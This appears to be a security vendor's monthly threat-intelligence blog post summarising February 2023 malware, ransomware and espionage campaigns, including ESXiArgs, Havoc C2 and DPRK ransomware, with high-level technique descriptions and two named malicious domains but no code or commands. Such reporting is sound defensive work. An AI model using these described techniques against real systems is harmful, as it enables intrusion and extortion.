-mask

Cyber Threat Breakdown February 2023

February might be the shortest month of the year, but cyber attackers are doing their best to make it count.

Here is a summary of February’s main attacks, indexed for easy navigation.

The New

XORDDOS Malware Strikes Again
Ice Breaker APT Group Analysis
DarkBit Demands Ransom from Technion University
Cl0p Ransomware Targets Linux Systems
New Mimic Ransomware Abuses Everything APIs
MortalKombat Ransomware Targets US Systems
Mylobot Malware Brings Sophistication to Botnets

The Comebacks

Ukraine Government Sector Targeted With The Dolphincape Information Stealer
Ukraine Cert-Ua: Compromised Email Address Used To Deliver Malware Variants
Trigona Ransomware Analysis
Vector Stealer Targets Rdp Files For Exfiltration
Massive Esxiargs Ransomware Attack Targets Vmware Esxi Servers Worldwide
Goot Camp Gootloader Operation
Water Dybbuk Uses Open-Source Toolkits For Bec Campaign
Ransomware Attacks On Critical Infrastructure Fund Dprk Malicious Cyber Activities
Newspenguin Targets Pakistan With Espionage Tool
Mustang Panda Apt Group Targets Europe With Plugx Backdoor
Seven Days Of The Collect Exfiltrate Sleep Repeat Spin Cycle
Asyncrat Being Distributed As Windows Help File
Hiding Html Smugglers In Your Inbox
Hardbit 2.0 Ransomware
Chinese Espionage Group Tonto Team Fails to Compromise Group IB
CatB Ransomware Demands 50 Bitcoin via Email
Havoc Framework Allows Advanced Evasion Techniques
Icedid Malware Spreads Through Emails and Fake Software Sites
Government Organizations Targeted with Havoc C2 Framework

The Oldies

Mirai Botnet Delivers Medusa Botnet To Target Linux Users
TA471 Targets Ukrainian Government Websites With Malware (Cert-Ua6060)
Us Cert Alert – Ransomware Attacks on Critical Infrastructure Fund DPRK Malicious Cyber Activities

The Newcomers 

XORDDOS Malware Strikes Again

Cymulate Research Lab detected a new variant of the XORDDOS malware, which was analyzed to identify the Command and Control (C&C) IP address and indicators of the malware’s activity on a deployed machine. Similar malware and code were also identified by Intezer.

Ice Breaker APT Group Analysis

A new threat actor, Ice Breaker APT, is using a specific social engineering technique to gain access to a target’s network. Analysts are still investigating, but have released information about the attacker’s Modus Operandi, attack chain, and ways to mitigate the threat, along with supported IOCs, TTPs, and Yara.

DarkBit Demands Ransom from Technion University

A new group called DarkBit has claimed responsibility for a ransomware attack on Israel’s Technion University, demanding $1.7 million in ransom to be paid within 48 hours. The group has threatened to increase the amount by 30% if the ransom is not received in time. DarkBit shared a messenger ID for the Tox secure messaging app, which individuals can use to recover their encrypted files.

Cl0p Ransomware Targets Linux Systems

SentinelLabs has detected the first Linux variant of the Cl0p ransomware, which contains a flawed encryption algorithm making it possible to decrypt locked files without paying the ransom. SentinelLabs has published a free decryptor for this variant. The ELF Cl0p variant is developed similarly to the Windows version but contains small differences due to OS differences, and appears to be in its initial development phases. The ransomware targets specific folders, subfolders, and all files/types.

New Mimic Ransomware Abuses Everything APIs

Trend Micro researchers discovered a new ransomware named Mimic that abuses the APIs of the Everything Windows filename search engine to query files that will be encrypted. This ransomware targets Russian and English-speaking users, with multiple capabilities such as deleting shadow copies and terminating applications and services.

MortalKombat Ransomware Targets US Systems

A new financially motivated campaign is using a variant of the Xortist ransomware, named MortalKombat, and the Laplas clipper to conduct financial fraud. The Laplas clipper steals cryptocurrency by hijacking crypto transactions, while MortalKombat is a less sophisticated variant of the Xortist ransomware that targets system files and applications. It corrupts system folders and disables the Windows Run command window, among other things, and demands payment in Bitcoin.

Mylobot Malware Brings Sophistication to Botnets

Researchers have discovered a new malware called MyloBot that features advanced evasion, infection, and propagation techniques, which implies that the authors have experience and heavy infrastructure. Among the techniques employed are anti-VM, anti-sandbox, and anti-debugging techniques, reflective EXE, and process hollowing. The malware allows attackers to gain full control of the infected machine, enabling them to add payloads for other purposes such as banking Trojans, keyloggers, and distributed denial of service (DDoS) use.

 

The Comebacks

Ukraine Government Sector Targeted With The Dolphincape Information Stealer

A spear-phishing campaign targeting the government sector of Ukraine has been discovered by researchers. The attackers used a malicious attachment that appeared to have been sent from the State Emergency Service of Ukraine. Once the attachment was opened, VBScript code created a scheduled task for persistence, and a PowerShell script downloaded the DolphinCape information stealer. The malware is capable of exfiltrating system information and taking screenshots of the infected device.

Ukraine Cert-Ua: Compromised Email Address Used To Deliver Malware Variants

An adversary was found to be using a compromised e-mail address to deliver phishing emails with a malicious PDF attachment. The files used in the attack were protected by VMProtect to hinder analysis. Successful intrusions resulted in systems being infected with variants from the RomCom, FateGrab, and StealDeal malware families.

Trigona Ransomware Analysis

Trigona ransomware, which first appeared on the threat landscape in late 2022, threatens to release stolen data if the ransom is not paid. The ransomware appends “._locked” to encrypted files and drops a ransom note in HTML format with instructions on how to retrieve the locked files. The threat actors behind the ransomware offer to decrypt three files for free to prove that the victims will get their sensitive data back.

Vector Stealer Targets Rdp Files For Exfiltration

Vector Stealer is an information stealer that has been sold on underground forums since 2022. The malicious software is distributed via spear-phishing emails with malicious attachments and can search and exfiltrate a range of sensitive data from the infected device. The malware uses an unknown crypter, KoiVM for virtualization, and specifically targets Remote Desktop files.

Massive Esxiargs Ransomware Attack Targets Vmware Esxi Servers Worldwide

Attackers are targeting unpatched VMware ESXi servers with a two-year-old remote code execution vulnerability to deploy a new ESXiArgs ransomware. The vulnerability tracked as CVE-2021-21974 is caused by a heap overflow issue in the OpenSLP service and can be exploited by unauthenticated threat actors. To block incoming attacks, admins need to disable the vulnerable Service Location Protocol (SLP) service on ESXi hypervisors that have not been updated.

Goot Camp Gootloader Operation

The Goot Camp campaign targets users looking for business-related documents online to drop variants from the GootLoader malware family. The operation also uses the FONELAUNCH and SNOWCONE loaders to retrieve payloads from remote locations and load malicious code into memory. The malicious ZIP archive downloaded by victims launches a series of scripts that result in the system being infected with malicious software, including a Cobalt Strike beacon.

Water Dybbuk Uses Open-Source Toolkits For Bec Campaign

Water Dybbuk targets large companies worldwide with a Business Email Compromise (BEC) campaign to steal credentials. The group uses spear-phishing emails with malicious attachments that direct victims to malicious websites. The BadaxxBot toolkit and Evilginx framework, along with the JavaScript Obfuscator Tool, are used for the operation.

Ransomware Attacks On Critical Infrastructure Fund Dprk Malicious Cyber Activities

The US government has issued an advisory on malicious cyber activities involving North Korean ransomware campaigns. The TTPs associated with DPRK ransomware attacks include the acquisition of infrastructure, identity obfuscation, and VPN usage. The actors use various exploits of common vulnerabilities and exposures to gain access to networks.

Newspenguin Targets Pakistan With Espionage Tool

The NewsPenguin threat actor targets Pakistani manufacturing, government, and military sectors with spear-phishing attachments. The final payload is an undocumented espionage tool that bypasses sandboxes and exfiltrates data from the infected system.

Mustang Panda Apt Group Targets Europe With Plugx Backdoor

Mustang Panda distributed PlugX malware through malicious optical disc image (ISO) files to entities in Europe. Microsoft Windows registry run keys were used for persistence, while symmetric cryptography and standard encoding were used to exfiltrate sensitive data.

Seven Days Of The Collect Exfiltrate Sleep Repeat Spin Cycle

Threat actors targeted users in a phishing campaign that delivered a job application themed macro enable document. The malicious scripts made use of many OS native tools as well as some legitimate open-source packages to carry out nefarious tasks. The attackers successfully acquired access and exfiltrated some collected data but did not carry out further actions on the victim’s machines.

Asyncrat Being Distributed As Windows Help File

A malware strain that uses the Windows Help file (*.chm) has been on the rise since last year. A blank Help screen is created when the CHM file is executed, and a malicious script is run under the user’s nose. This script uses mshta to execute a malicious command that exists in a remote address. The malware is being executed in a fileless format, making it difficult for users to identify what type of malware was executed.

Hiding Html Smugglers In Your Inbox

Threat actors use HTML Smuggling techniques to deliver malware such as Qakbot XWorm, Cobalt Strike, and IcedID. Spear-phishing emails are sent with HTML attachments that may directly drop an archive file containing a malicious LNK file to the victim machine or present a file impersonating well-known vendors. The victim is then coerced into executing the archive or saving and executing a malicious file.

Hardbit 2.0 Ransomware:

The original HardBit is a ransomware threat that targets organizations to extort cryptocurrency payments for the decryption of their data. HardBit version 2.0 was introduced with samples seen throughout the end of 2022 and into 2023. The ransomware claims to steal sensitive data from their victims and encrypts it. Unlike many of their peers, HardBit does not appear to have a leak site at this time and is not currently using the double extortion tactic. The ransomware performs a number of steps to reduce the security posture of the host before encrypting victim data, including gathering information about the victim host via web-based enterprise management and Windows Management Instrumentation functions, dropping a custom HardBit file icon into the victim’s documents folder, deleting the Volume Shadow Copy Service and backups, editing the boot configuration, disabling many Windows Defender Antivirus features, terminating services, and ensuring the HardBit ransomware payload is automatically executed whenever the system is rebooted. The encryption phase involves maneuvering through all directories and files to locate data for encryption, overwriting the files, renaming the encrypted files with a seemingly random file name followed by an identifier, and writing a plain text ransom note and a HTML application (HTA) ransom note to the drive root and all folders containing encrypted files. An image file is saved on the victim’s desktop, which is set as the system wallpaper via a Windows Registry update, and the HTA ransom note is executed to display interactive content.

Chinese Espionage Group Tonto Team Fails to Compromise Group IB

The Tonto Team, an espionage group known for targeting various strategic sectors since 2009, recently attempted to compromise the security firm Group IB. They sent weaponized attachments to employees, masquerading as employees of legitimate organizations, and used fake email IDs created with GMX Mail. The campaign used the Royal Road weaponizer to create documents that exploit CVEs related to the MS Equation Editor vulnerabilities. The Tonto Team also used the Bisonal DoubleT backdoor and the TontoTeam.Downloader to collect intellectual property.

CatB Ransomware Demands 50 Bitcoin via Email

CatB ransomware emerged in late 2022, requiring victims to contact the threat actor via email only. The malware uses DLL sideloading to execute the payload and performs system checks to ensure it is not running on virtual machines or sandboxes. The ransomware demands 50 Bitcoin to obtain the decryption key and is packed using UPX.

Havoc Framework Allows Advanced Evasion Techniques

A new campaign targeting a government organization utilized the open-source Havoc framework, an advanced command and control framework capable of bypassing the most current and updated version of Windows 11 defender. Havoc is known for using advanced evasion techniques such as indirect syscalls and sleep obfuscation, which makes detection and analysis difficult.

Icedid Malware Spreads Through Emails and Fake Software Sites

IcedID (also known as Bokbot) is a backdoor malware that steals information and can lead to other malicious activities such as Cobalt Strike and VNC traffic.
It is commonly distributed through email campaigns, and security analysts have also observed it being delivered through fake software sites that use Google ad traffic.

Government Organizations Targeted with Havoc C2 Framework

A new attack campaign was found that uses the Havoc Command and Control (C2) framework to target government organizations.

The Havoc Demon created by the framework evades detection by disabling the Event Tracing for Windows (ETW) and uses CreateThreadpoolWait() to decrypt and execute shellcode.

The malware also loads the Havoc’s Demon DLL reflectively and resolves virtual addresses using API hashing routines.

The infection chain consists of several malicious documents including a decoy file, a downloader, a batch script, and a benign JPEG file.

The Oldies

Mirai Botnet Delivers Medusa Botnet To Target Linux Users

The Mirai botnet has been delivering the recently discovered Medusa botnet and stealer malware. Medusa Botnet has the capabilities to target victims for DDoS attacks, encrypt targets with ransomware, and build upon its infrastructure by acquiring infected machines. The malware uses open-source tools such as psutil, ZMap, scapy, and common binaries like telnet, SSH, and wget.

TA471 Targets Ukrainian Government Websites With Malware (Cert-Ua6060)

The TA471 threat group, also known as Ember, Bear, Lorec53, and UAC-0056, has targeted Ukrainian government websites. They used custom backdoors, web shells, and tunneling tools such as CredPump, HoaxPen, HoaxApe, Ngrok, and Gost to carry out the infection process.

Us Cert Alert – Ransomware Attacks on Critical Infrastructure Fund DPRK Malicious Cyber Activities

The United States National Security Agency (NSA), the FBI, the Cybersecurity and Infrastructure Security Agency (CISA), the Department of Health and Human Services (HHS), the Republic of Korea (ROK) National Intelligence Service (NIS), and the ROK Defense Security Agency (DSA) have issued a joint Cybersecurity Advisory (CSA) to highlight ongoing ransomware activity against Healthcare and Public Health Sector organizations and other critical infrastructure sector entities. The advisory is supplementary to previous reports on malicious cyber actor activities involving DPRK ransomware campaigns, namely Maui and H0lyGh0st ransomware. The report highlights the TTPs (tactics, techniques, and procedures) that DPRK cyber actors use to conduct ransomware attacks targeting South Korean and US healthcare systems. The observable TTPs include acquiring infrastructure, obfuscating identity, purchasing VPNs and VPSs, gaining access through exploits of common vulnerabilities and exposures, and spreading malware through Trojanized files for “X-Popup.” The actors spread malware by leveraging two domains: xpopup.pe.kr and xpopup.com.

 

That is all for now.

 

Stay cyber safe!

Star Your Free Trial

Related Resources

blog

How Continuous Security Validation Prevents Undetected Security Drift

Learn how our customers spot security drift and reduce risk before a breach occurs.

Read More arrow icon

Solution Brief

Security Control and Threat Validation

Read more about how to safely and continuous assess the efficacy of security controls.

Read More arrow icon

customer testimonial

Persistent Systems Gains Visibility & Control of its Security Posture

Learn why Persistent Systems chose Cymulate to initiate a continuous offensive testing strategy.

Read More arrow icon